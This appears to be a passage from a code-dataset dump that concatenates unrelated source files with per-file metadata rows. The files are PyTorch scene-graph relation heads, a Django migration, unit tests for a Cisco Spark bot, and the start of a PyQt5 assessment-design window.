        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * self.fpn_num_branches == len( self.in_features), \
            "number of features and strides mismatch."
        deformable_on = cfg.MODEL.HEADS.RAF.LAST_DEFORM_ON
        num_groups = cfg.MODEL.HEADS.RAF.NUM_GROUPS
        width_per_group = cfg.MODEL.HEADS.RAF.WIDTH_PER_GROUP
        bottleneck_channels = num_groups * width_per_group
        conv_dim = cfg.MODEL.HEADS.CONV_DIM
        num_conv = cfg.MODEL.HEADS.NUM_CONV
        conv_norm = cfg.MODEL.HEADS.NORM
        conv_dims = [conv_dim] * num_conv
        raf_conv_dims = [cfg.MODEL.HEADS.RAF.CONV_DIM] * cfg.MODEL.HEADS.RAF.NUM_CONV
        kernel_size = cfg.MODEL.HEADS.RAF.KERNEL_SIZE
        in_channels = self.in_channels[0]
        # Class-heatmap head.  No activation here: the raw logits are fused
        # for the relation branch; forward() applies sigmoid afterwards.
        self.cls_head = MultiBNSingleHead(
            in_channels,
            self.num_classes,
            self.output_stride,
            conv_dims,
            conv_norm=conv_norm,
            bias_fill=True,
            bias_value=self.cls_bias_value,
            activation=None,
            output_strides=self.output_strides,
            bn_momentum=bn_momentum
        )
        # Box width/height regression head (2 channels, raw output).
        self.wh_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
                                         conv_dims,
                                         bias_fill=True,
                                         conv_norm=conv_norm,
                                         activation=None,
                                         output_strides=self.output_strides,
                                         bn_momentum=bn_momentum)
        # Center-offset regression head (2 channels, raw output).
        self.reg_head = MultiBNSingleHead(in_channels, 2, self.output_stride,
                                          conv_dims,
                                          conv_norm=conv_norm,
                                          activation=None,
                                          output_strides=self.output_strides,
                                          bn_momentum=bn_momentum)
        if self.relation_on:
            # RAF head input is the backbone features concatenated with the
            # fused class heatmaps (hence + num_classes input channels).
            self.raf_head = MultiBNSingleHead(in_channels + self.num_classes,
                                              2 * self.num_predicates,
                                              self.output_stride,
                                              raf_conv_dims,
                                              kernel_size=kernel_size,
                                              conv_norm=conv_norm,
                                              bias_fill=True,
                                              deformable_on=deformable_on,
                                              dilation=self.raf_dilation,
                                              bottleneck_channels=bottleneck_channels,
                                              activation=None,
                                              output_strides=self.output_strides,
                                              down_ratio=self.down_ratio
                                              )
            # Fuses the per-scale class heatmaps, producing one fused map per
            # scale (multi_scale_output=True).
            self.fuse_layer = MultiscaleFusionLayer(len(self.output_strides),
                                                    [self.num_classes] * len(self.output_strides),
                                                    multi_scale_output=True,
                                                    norm="SyncBN")
        if self.training:
            # Loss evaluator is only needed during training.
            self.raf_loss_evaluator = RAFLoss(cfg)
        # if self.use_non_local:
        #     self.non_local_attn = NONLocalBlock2D(self.num_classes,
        #                                           out_channels=in_channels,
        #                                           inter_channels=in_channels,
        #                                           norm=conv_norm,
        #                                           sub_sample=False,
        #                                           g_given=True)
    def _forward_raf_branch(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Predict relation affinity fields for one scale.

        Args:
            features: relation-branch features already concatenated with the
                fused class heatmaps (done by ``forward``).
            targets: ground truth for this scale; required in training mode.
            stride: output stride of this scale (selects BN statistics).

        Returns:
            ``(losses, preds)`` with ``preds = {'raf': ...}``; ``losses``
            contains ``'loss_raf'`` only in training mode.
        """
        losses = {}
        if self.training:
            assert targets
        rafs = self.raf_head(features, stride)
        preds = {'raf': rafs}
        if self.training:
            loss_raf = self.raf_loss_evaluator(rafs, targets)
            loss_raf *= self.raf_loss_weight
            losses = {'loss_raf': loss_raf}
        return losses, preds
    def _forward_object_branch(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None,
            stride: int = 0
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Predict class heatmaps (logits) and box regressions for one scale.

        Args:
            features: center branch features from backbone (w/fpn).
            targets: ground truth for this scale; required in training mode.
            stride: output stride of this scale (selects BN statistics).

        Returns:
            ``(losses, preds)`` with ``preds`` holding 'cls' (logits), 'wh',
            'reg'.
        """
        losses = {}
        if self.training:
            assert targets
        cls = self.cls_head(features, stride)
        wh = self.wh_head(features, stride)
        reg = self.reg_head(features, stride)
        preds = {
            'cls': cls,
            'wh': wh,
            'reg': reg
        }
        if self.training:
            # cls is still logits here, hence after_activation=False.
            losses.update(self.loss(preds, targets, after_activation=False))
        return losses, preds
    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        """Run object heads per scale, fuse their heatmaps, then RAF heads.

        Loss keys are suffixed with ``"_s<stride>"``.
        """
        features = [features[f] for f in self.in_features]
        preds, losses = [], {}
        if self.fpn_num_branches == 2:
            # right now only support 2 branches
            object_branch_features = features[:len(self.output_strides)]
            relation_branch_features = features[len(self.output_strides):]
        else:
            # Single branch: both head groups share the same features.
            object_branch_features = features
            relation_branch_features = features
        center_preds = []
        targets_all_scales = [[target[i] for target in targets] for i in range(len(self.output_strides))] \
            if self.training else [None for _ in range(len(self.output_strides))]
        # forward object branch first
        for i, features_per_scale in enumerate(object_branch_features):
            # form a SceneGraph
            targets_per_scale = targets_all_scales[i]
            cur_stride = "_s" + str(self.strides[i])
            loss, pred = self._forward_object_branch(features_per_scale, targets_per_scale, self.strides[i])
            loss = {k + cur_stride: v for k, v in loss.items()}
            # if self.training or self.use_gt_label:
            #     ct_maps_per_scale = torch.stack([target.gt_ct_maps[i] for target in targets], dim=0)
            # else:
            # Detach the logits so the relation branch does not backprop into
            # the object branch.
            ct_maps_per_scale = pred['cls'].detach()
            center_preds.append(ct_maps_per_scale)
            losses.update(loss)
            # Convert the returned heatmaps to probabilities for downstream
            # consumers; the fused copy above keeps the raw logits.
            pred['cls'] = torch.sigmoid(pred['cls'])
            preds.append(pred)
        if self.relation_on:
            # multi-scale center feature maps fusion
            fused_center_feats = self.fuse_layer(center_preds)
            # then forward raf branch
            for i, features_per_scale in enumerate(relation_branch_features):
                # add non local block
                # nonlocal_feat = self.non_local_attn(fused_center_feats[i])
                # cat_feat = torch.cat((features_per_scale, nonlocal_feat), dim=1)
                # if self.use_non_local:
                #     features_per_scale = self.non_local_attn(fused_center_feats[i], features_per_scale)
                # else:
                # simple concat
                features_per_scale = torch.cat((features_per_scale, fused_center_feats[i]), dim=1)
                targets_per_scale = targets_all_scales[i]
                cur_stride = "_s" + str(self.strides[i])
                loss, pred = self._forward_raf_branch(features_per_scale, targets_per_scale, self.strides[i])
                loss = {k + cur_stride: v for k, v in loss.items()}
                losses.update(loss)
                # Merge RAF predictions into this scale's prediction dict.
                preds[i].update(pred)
        return losses, preds
@HEADS_REGISTRY.register()
class MultiScaleDualHeads(DualBranchHeads):
    """Dual-branch heads applied per scale.

    The flattened input feature list contains two branches back to back: the
    first half feeds the object branch and the second half the relation
    branch, with feature ``i`` of each half sharing stride ``strides[i]``.
    Loss keys are suffixed with ``"_s<stride>"``.
    """

    def __init__(self, cfg, input_shape):
        super().__init__(cfg, input_shape)
        # Two branches worth of features are expected, one per stride each.
        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) * 2 == len(self.in_features), "number of features and strides mismatch."
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
        # Number of feature maps belonging to each of the two branches.
        self.num_features_per_branch = len(self.strides)

    def _forward(
            self,
            features: Tuple[torch.Tensor, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Delegate one (object, relation) feature pair to the parent head."""
        losses, preds = super().forward(features, targets)
        return losses, preds

    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        """Run the dual-branch head at every scale and merge the losses."""
        features = [features[f] for f in self.in_features]
        preds, losses = [], {}
        # BUGFIX: the branch split point was hard-coded to 4; derive it from
        # the configured number of strides (as the __init__ assert and the
        # sibling MultiScaleSwitchNormDualHeads already do) so configs with a
        # different number of scales work.
        n = self.num_features_per_branch
        for i, features_per_scale in enumerate(zip(features[:n], features[n:])):
            # form a SceneGraph
            targets_per_scale = [target[i] for target in targets] if self.training else None
            cur_stride = "_s" + str(self.strides[i])
            loss, pred = self._forward(features_per_scale, targets_per_scale)
            loss = {k + cur_stride: v for k, v in loss.items()}
            losses.update(loss)
            preds.append(pred)
        return losses, preds
@HEADS_REGISTRY.register()
class MultiStageHeads(CenternetRelationHeads):
    """Multi-stage variant: every stage is supervised, but only the final
    stage's predictions are returned to the caller.

    Loss keys carry a per-stage suffix such as ``"_s4_0"`` so that losses from
    different stages do not collide.
    """

    def __init__(self, cfg, input_shape):
        super().__init__(cfg, input_shape)
        # One ground-truth downsampling stride per input feature.
        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES
        # Pre-computed per-stage loss suffixes: "_s<stride>_<stage index>".
        self.out_names = ["_s{}_{}".format(stride, i) for i, stride in enumerate(self.strides)]

    def _forward(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Delegate a single stage to the parent head."""
        return super().forward(features, targets)

    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        losses: Dict[str, torch.Tensor] = {}
        stage_preds: List[Dict[str, torch.Tensor]] = []
        for idx, feat_name in enumerate(self.in_features):
            scale_targets = [target[idx] for target in targets] if self.training else None
            stage_losses, pred = self._forward(features[feat_name], scale_targets)
            name = self.out_names[idx]
            losses.update({key + name: val for key, val in stage_losses.items()})
            stage_preds.append(pred)
        # Only the last stage's predictions are consumed downstream.
        return losses, stage_preds[-1]
@HEADS_REGISTRY.register()
class MultiScaleCascadeHeads(CenternetCascadeHeads):
    """Cascade heads evaluated independently at each input scale.

    Loss keys get a ``"_s<stride>"`` suffix; one prediction dict is returned
    per scale.
    """

    def __init__(self, cfg, input_shape):
        super().__init__(cfg, input_shape)
        # Ground-truth downsampling strides, e.g. [1, 2, 4, 8]; one per feature.
        assert len(cfg.MODEL.HEADS.OUTPUT_STRIDES) == len(self.in_features), "number of features and strides mismatch."
        self.strides = cfg.MODEL.HEADS.OUTPUT_STRIDES

    def _forward(
            self,
            features: torch.Tensor,
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]:
        """Delegate one scale to the cascade parent head."""
        return super().forward(features, targets)

    def forward(
            self,
            features: Dict[str, torch.Tensor],
            targets: Optional[List[SceneGraph]] = None
    ) -> Tuple[Dict[str, torch.Tensor], List[Dict[str, torch.Tensor]]]:
        losses: Dict[str, torch.Tensor] = {}
        preds: List[Dict[str, torch.Tensor]] = []
        for idx, feat_name in enumerate(self.in_features):
            per_scale_targets = [t[idx] for t in targets] if self.training else None
            stride_suffix = "_s" + str(self.strides[idx])
            scale_loss, scale_pred = self._forward(features[feat_name], per_scale_targets)
            for key, value in scale_loss.items():
                losses[key + stride_suffix] = value
            preds.append(scale_pred)
        return losses, preds
| 44.753325
| 123
| 0.568101
| 4,122
| 37,011
| 4.854682
| 0.065987
| 0.027985
| 0.040927
| 0.045875
| 0.884264
| 0.879166
| 0.867573
| 0.860926
| 0.85428
| 0.849483
| 0
| 0.003653
| 0.341736
| 37,011
| 827
| 124
| 44.753325
| 0.817715
| 0.077274
| 0
| 0.84522
| 0
| 0
| 0.022243
| 0.000621
| 0
| 0
| 0
| 0
| 0.027314
| 1
| 0.047041
| false
| 0
| 0.030349
| 0
| 0.124431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8592dc91d5619a73422841e401fd7c656cde7e1f
| 1,894
|
py
|
Python
|
JIT/migrations/0026_auto_20200621_0131.py
|
Archikins/jumpintotech
|
85549c5d8746bd68d028e7966480f4e9de066c8b
|
[
"MIT"
] | null | null | null |
JIT/migrations/0026_auto_20200621_0131.py
|
Archikins/jumpintotech
|
85549c5d8746bd68d028e7966480f4e9de066c8b
|
[
"MIT"
] | 3
|
2021-03-30T14:08:27.000Z
|
2021-06-04T23:48:08.000Z
|
JIT/migrations/0026_auto_20200621_0131.py
|
Archikins/jumpintotech
|
85549c5d8746bd68d028e7966480f4e9de066c8b
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.5 on 2020-06-21 01:31
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a ``public`` flag to the Tipo* models and normalize it elsewhere."""

    dependencies = [
        ('JIT', '0025_auto_20200621_0124'),
    ]

    # Every operation installs the identical BooleanField; only the target
    # model and the operation kind (Add vs Alter) differ, so the list is
    # generated instead of spelled out nine times.
    operations = [
        migrations.AddField(
            model_name=model,
            name='public',
            field=models.BooleanField(default=False, verbose_name='¿Público?'),
        )
        for model in ('tiponoticia', 'tipoproyecto', 'tiposervicio')
    ] + [
        migrations.AlterField(
            model_name=model,
            name='public',
            field=models.BooleanField(default=False, verbose_name='¿Público?'),
        )
        for model in ('equipo', 'noticia', 'paso_filosofia', 'post_blog',
                      'proyecto', 'servicio')
    ]
| 32.101695
| 79
| 0.56811
| 175
| 1,894
| 6.068571
| 0.28
| 0.076271
| 0.127119
| 0.177966
| 0.757062
| 0.757062
| 0.757062
| 0.757062
| 0.757062
| 0.757062
| 0
| 0.02352
| 0.304118
| 1,894
| 58
| 80
| 32.655172
| 0.775417
| 0.023759
| 0
| 0.692308
| 1
| 0
| 0.134272
| 0.012453
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4309ad8575d1f0671bce9469eb6c05d965e7b49
| 6,455
|
py
|
Python
|
tests/sparkbot.py
|
wipro0/Sparkbot
|
95061e876d5a6e2fa2b18bc48c55228c6ff6b192
|
[
"Apache-2.0"
] | 1
|
2020-02-23T14:55:56.000Z
|
2020-02-23T14:55:56.000Z
|
tests/sparkbot.py
|
wipro0/Sparkbot
|
95061e876d5a6e2fa2b18bc48c55228c6ff6b192
|
[
"Apache-2.0"
] | null | null | null |
tests/sparkbot.py
|
wipro0/Sparkbot
|
95061e876d5a6e2fa2b18bc48c55228c6ff6b192
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from ciscosparkbot import SparkBot
import requests_mock
from .spark_mock import MockSparkAPI
class SparkBotTests(unittest.TestCase):
    """Unit tests for ciscosparkbot.SparkBot against a mocked Spark API.

    The bot-construction and endpoint-mocking boilerplate that was
    duplicated across every test is factored into the private helpers
    ``_mock_webhooks``, ``_build_app``, ``_mock_messages`` and
    ``_post_incoming``; test names and observable behavior are unchanged.
    """

    def _mock_webhooks(self, m, list_json):
        """Mock the Spark webhooks endpoint (GET returns *list_json*)."""
        m.get('https://api.ciscospark.com/v1/webhooks', json=list_json)
        m.post('https://api.ciscospark.com/v1/webhooks',
               json=MockSparkAPI.create_webhook())

    def _build_app(self, bot_email="test@test.com"):
        """Create a SparkBot with the canned test config and expose its
        test client as ``self.app``.

        :param bot_email: bot account email; ``None`` exercises the
            bad-config ValueError path in the SparkBot constructor.
        """
        bot = SparkBot("testbot",
                       spark_bot_token="somefaketoken",
                       spark_bot_url="http://fakebot.com",
                       spark_bot_email=bot_email,
                       debug=True)
        bot.add_command('/dosomething',
                        'help for do something',
                        self.do_something)
        bot.testing = True
        self.app = bot.test_client()

    def _mock_messages(self, m, message_json):
        """Mock the people/messages endpoints around one incoming message."""
        m.get('//api.ciscospark.com/v1/people/me', json=MockSparkAPI.me())
        m.get('//api.ciscospark.com/v1/messages/incoming_message_id',
              json=message_json)
        m.post('//api.ciscospark.com/v1/messages', json={})

    def _post_incoming(self):
        """POST the canned incoming-message webhook payload to the bot."""
        return self.app.post('/',
                             data=MockSparkAPI.incoming_msg(),
                             content_type="application/json")

    @requests_mock.mock()
    def setUp(self, m):
        self._mock_webhooks(m, MockSparkAPI.list_webhooks())
        self._build_app()

    def do_something(self, incoming_msg):
        """
        Sample function to do some action.
        :param incoming_msg: The incoming message object from Spark
        :return: A text or markdown based reply
        """
        return "i did what you said - {}".format(incoming_msg.text)

    @requests_mock.mock()
    def test_webhook_already_exists(self, m):
        self._mock_webhooks(m, MockSparkAPI.list_webhooks_exist())
        self._build_app()

    @requests_mock.mock()
    def test_bad_config_raises_valueerror(self, m):
        with self.assertRaises(ValueError):
            self._mock_webhooks(m, MockSparkAPI.list_webhooks_exist())
            # bot_email=None is the invalid configuration under test.
            self._build_app(bot_email=None)

    @requests_mock.mock()
    def test_spark_setup(self, m):
        self._mock_webhooks(m, MockSparkAPI.list_webhooks())

    def test_health_endpoint(self):
        resp = self.app.get('/health')
        self.assertEqual(resp.status_code, 200)
        self.assertIn(b"I'm Alive", resp.data)

    def test_config_endpoint(self):
        resp = self.app.get('/config')
        self.assertEqual(resp.status_code, 200)
        self.assertIn(b"test@test.com", resp.data)

    @requests_mock.mock()
    def test_process_incoming_message_send_help(self, m):
        self._mock_messages(m, MockSparkAPI.get_message_help())
        resp = self._post_incoming()
        self.assertEqual(resp.status_code, 200)
        print(resp.data)
        self.assertIn(b'I understand the following commands', resp.data)

    @requests_mock.mock()
    def test_process_incoming_message_default_command(self, m):
        self._mock_messages(m, MockSparkAPI.empty_message())
        resp = self._post_incoming()
        self.assertEqual(resp.status_code, 200)
        print(resp.data)
        self.assertIn(b'I understand the following commands', resp.data)

    @requests_mock.mock()
    def test_process_incoming_message_match_command(self, m):
        self._mock_messages(m, MockSparkAPI.get_message_dosomething())
        resp = self._post_incoming()
        self.assertEqual(resp.status_code, 200)
        print(resp.data)

    @requests_mock.mock()
    def test_process_incoming_message_from_bot(self, m):
        self._mock_messages(m, MockSparkAPI.get_message_from_bot())
        resp = self._post_incoming()
        self.assertEqual(resp.status_code, 200)
        print(resp.data)

    def tearDown(self):
        pass
| 39.845679
| 74
| 0.58172
| 738
| 6,455
| 4.892954
| 0.154472
| 0.072002
| 0.088618
| 0.099695
| 0.845195
| 0.838826
| 0.824425
| 0.824425
| 0.824425
| 0.799502
| 0
| 0.008435
| 0.302091
| 6,455
| 161
| 75
| 40.093168
| 0.793119
| 0.046321
| 0
| 0.776923
| 0
| 0
| 0.197872
| 0.076596
| 0
| 0
| 0
| 0
| 0.084615
| 1
| 0.092308
| false
| 0.007692
| 0.030769
| 0
| 0.138462
| 0.030769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4a6b49241cdbacedc137e80e687d480fe08897d
| 93,431
|
py
|
Python
|
Python Files/assessment.py
|
Rimshay/Auto-Math-Assessment-Designer
|
ea6ecb7246b0333bb36af0abae875a7d49815944
|
[
"MIT"
] | null | null | null |
Python Files/assessment.py
|
Rimshay/Auto-Math-Assessment-Designer
|
ea6ecb7246b0333bb36af0abae875a7d49815944
|
[
"MIT"
] | null | null | null |
Python Files/assessment.py
|
Rimshay/Auto-Math-Assessment-Designer
|
ea6ecb7246b0333bb36af0abae875a7d49815944
|
[
"MIT"
] | null | null | null |
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import *
import textract
import source
import csv
import sqlite3
import shutil
import os
import webbrowser
import platform
import subprocess
import numpy as np
import pandas as pd
from ualreadyexist import *
class Ui_NewAssessment(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(895, 700)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.TitleS = QtWidgets.QLabel(self.centralwidget)
self.TitleS.setGeometry(QtCore.QRect(470, 40, 125, 25))
self.TitleS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TitleS.setObjectName("Title")
self.TypeS = QtWidgets.QLabel(self.centralwidget)
self.TypeS.setGeometry(QtCore.QRect(600, 40, 100, 25))
self.TypeS.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.TypeS.setObjectName("Type")
self.Ques = QtWidgets.QLabel(self.centralwidget)
self.Ques.setGeometry(QtCore.QRect(695, 40, 90, 25))
self.Ques.setStyleSheet("font: 14pt \"Arial\";\n"
"color: rgb(2, 114, 118);\n")
self.Ques.setObjectName("Ques")
self.label0 = QtWidgets.QLabel(self.centralwidget)
self.label0.setStyleSheet("color:rgb(255, 255, 255);")
self.label0.setGeometry(QtCore.QRect(20, 20, 95, 18))
self.label0.setObjectName("label0")
self.label1 = QtWidgets.QLineEdit(self.centralwidget)
self.label1.setStyleSheet("color:rgb(25, 25, 25);")
self.label1.setGeometry(QtCore.QRect(200, 170, 133, 25))
self.label1.setObjectName("label1")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setStyleSheet("font: 11pt \"Arial\";")
self.label.setGeometry(QtCore.QRect(80, 50, 95, 18))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(80, 90, 180, 18))
self.label_2.setStyleSheet("font: 11pt \"Arial\";")
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(80, 130, 180, 18))
self.label_3.setStyleSheet("font: 11pt \"Arial\";")
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(80, 170, 180, 18))
self.label_4.setStyleSheet("font: 11pt \"Arial\";")
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(80, 210, 111, 18))
self.label_5.setStyleSheet("font: 11pt \"Arial\";")
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(80, 250, 111, 18))
self.label_6.setStyleSheet("font: 11pt \"Arial\";")
self.label_6.setObjectName("label_6")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(80, 290, 111, 18))
self.label_8.setStyleSheet("font: 11pt \"Arial\";")
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(80, 330, 111, 18))
self.label_9.setStyleSheet("font: 11pt \"Arial\";")
self.label_9.setObjectName("label_9")
self.label_10 = QtWidgets.QLabel(self.centralwidget)
self.label_10.setGeometry(QtCore.QRect(80, 370, 111, 18))
self.label_10.setStyleSheet("font: 11pt \"Arial\";")
self.label_10.setObjectName("label_10")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(80, 410, 170, 18))
self.label_11.setStyleSheet("font: 11pt \"Arial\";")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(80, 450, 170, 18))
self.label_12.setStyleSheet("font: 11pt \"Arial\";")
self.label_12.setObjectName("label_12")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(80, 490, 170, 18))
self.label_13.setStyleSheet("font: 11pt \"Arial\";")
self.label_13.setObjectName("label_13")
self.label_15 = QtWidgets.QLabel(self.centralwidget)
self.label_15.setGeometry(QtCore.QRect(80, 530, 170, 18))
self.label_15.setStyleSheet("font: 11pt \"Arial\";")
self.label_15.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(20, 580, 170, 18))
self.label_14.setStyleSheet("font: 11pt \"Arial\";")
self.label_14.setObjectName("label_13")
self.col = ['Questions', 'QDescription']
self.tableView = QtWidgets.QTableWidget(self.centralwidget)
self.tableView.setGeometry(QtCore.QRect(450, 100, 391, 401))
self.tableView.setColumnCount(2)
self.tableView.setHorizontalHeaderLabels(self.col)
self.tableView.setObjectName("tableWidget")
#self.tableWidget.setColumnCount(0)
#self.tableWidget.setRowCount(0)
self.comboBox = QtWidgets.QComboBox(self.centralwidget)
self.comboBox.setGeometry(QtCore.QRect(200, 50, 151, 25))
self.comboBox.addItem("Linear Algebra")
self.comboBox.addItem("Calculus")
self.comboBox.addItem("Probability")
self.comboBox.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox.setObjectName("comboBox")
self.comboBox_2 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_2.setGeometry(QtCore.QRect(230, 90, 151, 25))
self.comboBox_2.addItem("Subjective")
self.comboBox_2.addItem("Objective")
self.comboBox_2.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_2.setObjectName("comboBox_2")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(240, 130, 133, 25))
self.lineEdit.setObjectName("lineEdit")
self.lineEdit_3 = QtWidgets.QDateEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(130, 210, 133, 25))
self.lineEdit_3.setObjectName("lineEdit_3")
self.lineEdit_4 = QtWidgets.QTimeEdit(self.centralwidget)
self.lineEdit_4.setGeometry(QtCore.QRect(130, 250, 133, 25))
self.lineEdit_4.setObjectName("lineEdit_4")
#self.lineEdit_5 = QtWidgets.QLineEdit(self.centralwidget)
#self.lineEdit_5.setGeometry(QtCore.QRect(200, 290, 133, 25))
#self.lineEdit_5.setObjectName("lineEdit_5")
self.comboBox_6 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_6.setGeometry(QtCore.QRect(200, 290, 133, 25))
self.comboBox_6.addItem("Linear Algebra")
self.comboBox_6.addItem("Calculus")
self.comboBox_6.addItem("Probability")
self.comboBox_6.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_6.setObjectName("comboBox_6")
#self.lineEdit_6 = QtWidgets.QLineEdit(self.centralwidget)
#self.lineEdit_6.setGeometry(QtCore.QRect(180, 330, 133, 25))
#self.lineEdit_6.setObjectName("lineEdit_6")
self.comboBox_5 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_5.setGeometry(QtCore.QRect(180, 330, 133, 25))
self.comboBox_5.addItem("CSN103, SEN103")
self.comboBox_5.addItem("CSN102, SEN102")
self.comboBox_5.addItem("CSN201, SEN201")
self.comboBox_5.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_5.setObjectName("comboBox_5")
self.lineEdit_8 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_8.setGeometry(QtCore.QRect(180, 370, 133, 25))
self.lineEdit_8.setObjectName("lineEdit_8")
#self.lineEdit_9 = QtWidgets.QLineEdit(self.centralwidget)
#self.lineEdit_9.setGeometry(QtCore.QRect(250, 410, 133, 25))
#self.lineEdit_9.setObjectName("lineEdit_9")
self.comboBox_4 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_4.setGeometry(QtCore.QRect(250, 410, 133, 25))
self.comboBox_4.addItem("Midterm")
self.comboBox_4.addItem("Finalterm")
self.comboBox_4.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_4.setObjectName("comboBox_4")
self.comboBox_3 = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_3.setGeometry(QtCore.QRect(250, 450, 133, 25))
self.comboBox_3.addItem("Spring 2021")
self.comboBox_3.addItem("Fall 2021")
self.comboBox_3.addItem("Summer2021")
self.comboBox_3.addItem("Spring 2022")
self.comboBox_3.addItem("Fall 2022")
self.comboBox_3.addItem("Summer 2022")
self.comboBox_3.addItem("Spring 2023")
self.comboBox_3.addItem("Fall 2023")
self.comboBox_3.addItem("Summer 2023")
self.comboBox_3.addItem("Spring 2024")
self.comboBox_3.setStyleSheet("border: 1px solid gray;\n"
"border-radius: 3px;\n"
"padding: 1px 18px 1px 3px;\n"
"min-width: 9em;\n"
"min-height: 2em;\n")
self.comboBox_3.setObjectName("comboBox_3")
self.lineEdit_11 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_11.setGeometry(QtCore.QRect(200, 490, 133, 25))
self.lineEdit_11.setObjectName("lineEdit_11")
